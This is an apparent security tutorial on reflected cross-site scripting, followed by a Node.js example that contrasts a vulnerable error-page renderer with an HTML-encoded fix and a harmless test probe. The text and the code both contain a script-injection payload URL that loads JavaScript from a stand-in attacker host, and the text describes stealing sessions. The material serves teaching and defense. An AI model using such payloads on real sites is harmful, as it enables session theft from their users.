Reflected XSS happens when user-supplied data in an HTTP request is included in the web page source without any validation. For example, consider a website that displays an error message when you enter incorrect input, where the content of the error message is taken from the error parameter in the query string:
https://website.thm/?error=Invalid input Detected
If the application doesn't check the contents of the error parameter, we could insert malicious code:
https://website.thm/?error=<script src="https://attacker.thm/evil.js"></script>
This would get rendered as:
<div class="alert alert-danger">
<p>
<script src="https://attacker.thm/evil.js"></script>
</p>
</div>
Example scenario
- Attacker sends a link with malicious payload to a victim
- Victim clicks the link and is taken to a vulnerable site
- The attacker's script contained in the link is executed in the context of the vulnerable website
- The gathered data (e.g. stolen session) is sent back to the attacker
The attacker could send such links directly or embed them in an iframe to execute code in the victim's browser, potentially revealing sensitive information.
How to test for Reflected XSS
Manually test every possible point of entry, including:
- Parameters in the URL query string
- The URL file path
- Sometimes HTTP headers (although unlikely to be exploitable in practice)
Once you've found some data which is being reflected in the web application, you'll then need to confirm that you can successfully run your JavaScript payload; your payload will be dependent on where in the application your code is reflected.
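The following is an added example, not code from the original page: a small Node.js model of the error-message page from the first section, in both its vulnerable form (the error parameter interpolated verbatim) and a hardened form (the parameter HTML-encoded before it reaches the `<p>` element), together with a check for the testing step above that reports whether the reflection point returns markup characters unencoded. The function names (renderErrorVulnerable, renderErrorSafe, escapeHtml, isReflectedUnencoded) and the probe marker are assumptions made for this illustration; the URLs and the alert markup are the ones the page shows.

```javascript
// Added example (not from the original page). Models the page's error-message
// endpoint: the `error` query parameter is placed inside <div class="alert alert-danger"><p>...</p></div>.
// Function names and the probe marker below are hypothetical, chosen for this illustration.

// Extract the `error` query parameter the way the page's server would (decoded form).
function errorParam(urlString) {
  const url = new URL(urlString);
  return url.searchParams.get("error") ?? "";
}

// Vulnerable form: the untrusted parameter is interpolated into the HTML verbatim,
// so any markup in it becomes part of the document (this is the page's reflected XSS).
function renderErrorVulnerable(urlString) {
  return `<div class="alert alert-danger">\n<p>\n${errorParam(urlString)}\n</p>\n</div>`;
}

// HTML-entity-encode the characters that can change document structure or
// terminate an attribute value. This is the correct encoding for an HTML text node.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened form: same template, but the parameter is encoded for the HTML text context,
// so a <script> tag arrives in the browser as literal text rather than an element.
function renderErrorSafe(urlString) {
  return `<div class="alert alert-danger">\n<p>\n${escapeHtml(errorParam(urlString))}\n</p>\n</div>`;
}

// Testing step from the page, done with a harmless probe instead of a payload:
// send a marker containing structural characters and see whether it comes back
// unchanged. Verbatim reflection means the point is injectable; encoded output means it is not.
function isReflectedUnencoded(renderFn, baseUrl) {
  const marker = '<"xsscheck">';  // constructed probe: no script, just markup characters
  const url = new URL(baseUrl);
  url.searchParams.set("error", marker);  // percent-encodes the marker into the query string
  return renderFn(url.toString()).includes(marker);
}

// Demonstration with the two URLs from the page.
const benignUrl = "https://website.thm/?error=Invalid input Detected";
const payloadUrl = 'https://website.thm/?error=<script src="https://attacker.thm/evil.js"></script>';

console.log("vulnerable render:\n" + renderErrorVulnerable(payloadUrl));
console.log("hardened render:\n" + renderErrorSafe(payloadUrl));
console.log("benign message still readable:\n" + renderErrorSafe(benignUrl));
console.log("vulnerable endpoint reflects unencoded:", isReflectedUnencoded(renderErrorVulnerable, "https://website.thm/"));
console.log("hardened endpoint reflects unencoded:", isReflectedUnencoded(renderErrorSafe, "https://website.thm/"));
```

Entity encoding is the right fix only because the page's reflection point is an HTML text node inside `<p>`; as the last paragraph notes, where the data lands determines what matters, and a value reflected inside an attribute or a script block needs the encoding appropriate to that context instead.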